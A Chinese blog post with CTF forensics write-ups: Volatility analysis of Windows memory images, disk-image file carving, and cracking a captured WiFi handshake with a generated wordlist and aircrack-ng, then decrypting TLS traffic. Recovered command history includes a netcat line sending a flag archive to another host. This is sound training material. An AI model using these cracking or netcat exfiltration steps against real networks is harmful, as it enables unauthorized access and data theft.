电子取证

断电的PC

参考我以前写的博客:https://blog.ixuchao.cn/archives/31.html

步骤如下:

root@Archerx:/home/xiaosai# volatility -f RAM.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/xiaosai/RAM.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80003fed070L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff80003feed00L
                KPCR for CPU 1 : 0xfffff880009ee000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2018-10-29 03:08:06 UTC+0000
     Image local date and time : 2018-10-29 11:08:06 +0800
root@Archerx:/home/xiaosai# volatility psscan -f RAM.vmem --profile=Win7SP1x64
Volatility Foundation Volatility Framework 2.6
Offset(P)          Name                PID   PPID PDB                Time created                   Time exited                   
------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------
0x000000007e6148b0 dwm.exe            1984    784 0x00000000138cc000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007e629b30 explorer.exe       2012   1960 0x0000000013993000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007e6bdb30 SearchProtocol      284    840 0x000000000e6b9000 2018-10-29 03:06:13 UTC+0000   2018-10-29 03:07:18 UTC+0000  
0x000000007e70d060 notepad.exe        2816   2012 0x0000000008a8b000 2018-10-29 03:07:47 UTC+0000                                 
0x000000007e716b30 wmpnetwk.exe       2900    468 0x0000000007d8e000 2018-10-29 03:07:52 UTC+0000                                 
0x000000007e7a7810 sppsvc.exe         2828    468 0x0000000008802000 2018-10-29 03:07:51 UTC+0000                                 
0x000000007e814b30 svchost.exe        1540    468 0x0000000018c91000 2018-10-29 03:05:51 UTC+0000                                 
0x000000007e92f060 svchost.exe        1576    468 0x0000000018c9b000 2018-10-29 03:05:51 UTC+0000                                 
0x000000007e9e83a0 taskhost.exe       1900    468 0x000000001457b000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007ea11060 svchost.exe         660    468 0x0000000027e15000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea41b30 SearchIndexer.      840    468 0x00000000107a2000 2018-10-29 03:06:11 UTC+0000                                 
0x000000007ea51b30 svchost.exe         752    468 0x00000000217fd000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea6c200 svchost.exe         784    468 0x0000000021544000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea74b30 svchost.exe         812    468 0x0000000020b0c000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007eaa4060 audiodg.exe         896    752 0x0000000020b30000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ead0800 svchost.exe         972    468 0x000000001fe56000 2018-10-29 03:05:49 UTC+0000                                 
0x000000007eafa890 svchost.exe         332    468 0x000000001fd22000 2018-10-29 03:05:49 UTC+0000                                 
0x000000007eb60b30 spoolsv.exe         644    468 0x0000000012980000 2018-10-29 03:05:50 UTC+0000                                 
0x000000007eb6db30 svchost.exe        1072    468 0x000000001cf62000 2018-10-29 03:05:50 UTC+0000                                 
0x000000007eb791d0 svchost.exe        2860    468 0x00000000087c8000 2018-10-29 03:07:51 UTC+0000                                 
0x000000007ecfe060 csrss.exe           380    364 0x0000000023ce5000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007ed0c530 csrss.exe           320    308 0x000000002446a000 2018-10-29 03:05:45 UTC+0000                                 
0x000000007ed64060 winlogon.exe        412    364 0x00000000236ab000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007eda3b30 lsass.exe           476    372 0x0000000022ab1000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007eda68c0 lsm.exe             488    372 0x0000000022d79000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007edf6b30 svchost.exe         584    468 0x0000000021d9a000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007f4d2b30 services.exe        468    372 0x00000000228cf000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007f4de590 WmiPrvSE.exe       3028    584 0x000000007a893000 2018-10-29 03:07:54 UTC+0000                                 
0x000000007f4e2410 smss.exe            248      4 0x000000002a484000 2018-10-29 03:05:43 UTC+0000                                 
0x000000007f4fe060 svchost.exe        1852    468 0x000000000c234000 2018-10-29 03:06:28 UTC+0000                                 
0x000000007ff09b30 System                4      0 0x0000000000187000 2018-10-29 03:05:43 UTC+0000                                 
0x000000007ff12060 wininit.exe         372    308 0x0000000023db0000 2018-10-29 03:05:46 UTC+0000                                 
root@Archerx:/home/xiaosai# volatility psscan -f RAM.vmem --profile=Win7SP1x64 --dump-dir . -p 2816
Volatility Foundation Volatility Framework 2.6
Usage: Volatility - A memory forensics analysis platform.

volatility: error: no such option: --dump-dir
root@Archerx:/home/xiaosai# volatility memdump -p 2816 -f RAM.vmem --profile=Win7SP1x64 --dump-dir . 
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing notepad.exe [  2816] to 2816.dmp
root@Archerx:/home/xiaosai# strings 2816.dmp | grep SDUT
SDUT2018{yOyQ031XGpiHhCA2qUwi0W9FSih4sIeZ}

大雄

查看进程发现有cmd.exe和nc.exe ,dump直接strings就能找到flag

我感觉正常思路应该是查看cmd.exe执行的命令

看到用nc传输了flag.zip文件

提取出flag.zip 发现有密码……目前密码还没找了……

步骤如下:

root@Archerx:/home/xiaosai# strings  3236.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3608 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing nc.exe [  3608] to 3608.dmp
root@Archerx:/home/xiaosai# strings 3608.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3872 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing nc.exe [  3872] to 3872.dmp
root@Archerx:/home/xiaosai# strings 3872.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3708 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing cmd.exe [  3708] to 3708.dmp
root@Archerx:/home/xiaosai# strings 3708.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility cmdscan  -f vmem --profile=Win7SP1x64 
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 2308
CommandHistory: 0x379ca0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0x31a350: nc 10.6.65.3 < C:\flag\flag.zipx
Cmd #1 @ 0x350eb0: nc 10.6.65.3 6666 < C:\flag\flag.zipx
Cmd #2 @ 0x350f10: nc 10.6.65.3 6666 < C:\flag\flag.zip
**************************************************
CommandProcess: conhost.exe Pid: 2308
CommandHistory: 0x37ecd0 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0xf4
**************************************************
CommandProcess: conhost.exe Pid: 2408
CommandHistory: 0x2ca9b0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0x2c9c00: ping -t 10.6.65.36
Cmd #1 @ 0x2c9c60: ping -t 10.6.65.4
Cmd #2 @ 0x2c9c90: ping -t 10.6.65.220
**************************************************
CommandProcess: conhost.exe Pid: 2408
CommandHistory: 0x2cab90 Application: PING.EXE Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x88
**************************************************
CommandProcess: conhost.exe Pid: 3540
CommandHistory: 0x1da9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3540
CommandHistory: 0x1dab90 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
Cmd #8 @ 0xffb46238: 
Cmd #9 @ 0x1b3340: 
md #23 @ 0x160158: 
Cmd #24 @ 0x1afca0: 
**************************************************
CommandProcess: conhost.exe Pid: 3476
CommandHistory: 0x10a9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3476
CommandHistory: 0x10af30 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
**************************************************
CommandProcess: conhost.exe Pid: 3916
CommandHistory: 0x41a9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3916
CommandHistory: 0x41ab90 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
Cmd #8 @ 0xffb46238: ;
Cmd #9 @ 0x3f3340: ?
Cmd #23 @ 0x3a0158: A
Cmd #24 @ 0x3efca0: ;

提取出flag.zip文件:

root@Archerx:/home/xiaosai# volatility filescan  -f vmem --profile=Win7SP1x64 | grep flag.zip
Volatility Foundation Volatility Framework 2.6
0x000000007e70f9a0      2      0 RW-rw- \Device\HarddiskVolume2\flag\flag.zipx\Desktop\flag.zipx
0x000000007e87f8a0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007e92f9e0      2      0 -W-rwd \Device\HarddiskVolume2\flag\flag.zipn\AppData\Local\Temp\vmware-wangjian\VMwareDnD\873b898e\flag.zip
0x000000007e98dbb0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007e9bddd0      2      0 RW-rw- \Device\HarddiskVolume2\flag\flag.zipx
0x000000007f28b700      2      1 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007fe97ae0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
root@Archerx:/home/xiaosai# ls
2816.dmp  2.png  3236.dmp  3608.dmp  3708.dmp  3872.dmp  black.png  DEEP.zip  file  go1.8.3.linux-amd64.tar.gz  logo.png  output  RAM.vmem  timg.jpg  tp5getshell.py  vmem
root@Archerx:/home/xiaosai# binwalk 3236.dmp | grep zip
root@Archerx:/home/xiaosai# volatility  -f vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007fe97ae0 -n --dump-dir=.
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x7fe97ae0   None   \Device\HarddiskVolume2\flag\flag.zip
SharedCacheMap 0x7fe97ae0   None   \Device\HarddiskVolume2\flag\flag.zip

损坏的图片

在线修复即可

kaka的HDD

Winhex 可以看到空闲分区有一个password

下面有两种做法,winhex进行文件恢复出一个zip,用上面的密码直接解压得到flag。

还可以用binwalk分析出该磁盘文件中有一个zip文件,dd提取出后解压得到flag

恐怖袭击

Codefest 2018 Intercept 原题

题解请参照:https://www.anquanke.com/post/id/158680

偷窥的wifi

WiFi.pcap 里面含有握手包,python生成密码,

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/12/13 下午 06:50

with open('dic.txt','w') as f:
    for q in range(10):
        for w in range(10):
            for e  in range(10):
                for r in range(10):
                    a = 'seclab'+str(q)+str(w)+str(e)+str(r)
                    f.write(a+'\n')

aircrack 破解WiFi密码

root@Archerx:/home/xiaosai# aircrack-ng wifi.cap 
Opening wifi.cap
Read 10678 packets.



      [00:00:00] 1016/9999 keys tested (3016.84 k/s) 

      Time left: 2 seconds                                      10.16%

                          KEY FOUND! [ seclab1012 ]


      Master Key     : 7E F7 C2 F7 15 B8 98 A0 5B 03 22 D7 E5 33 F0 A8 
                       C3 84 B6 8B A6 94 17 6A 0E 12 6B CA 35 05 36 E5 

      Transient Key  : 72 98 AB 10 F2 4E 97 4B 89 83 12 25 79 02 0E EF 
                       63 6F 39 FB 4B 83 06 06 FF 7A 3E 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 08 68 78 A4 75 59 F2 A7 F9 31 CD 7B 66 FB 45 A8 

使用XOR.exe解密KEY.bin,密码为wifi密码
得到HTTP SSL密钥数据

https详解:https://www.jianshu.com/p/e96620cdc2cf

导入wireshark解密ssl流量

导出一个flag.zip的压缩包,里面有一个flag.txt转换成ascii即可。

  • 写完题解整个人都不好了

已有 2 条评论

  1. zzp:

    最后那个我记得其实也是有类似的题,当时就不会做,用crunch生成密码字典更快,用aircrack-ng进行破解wifi密码

    2018-12-15 22:49 回复
    1. Archerx:

      恩,这种题确实做过不止一次两次

      2018-12-19 22:34 回复

preView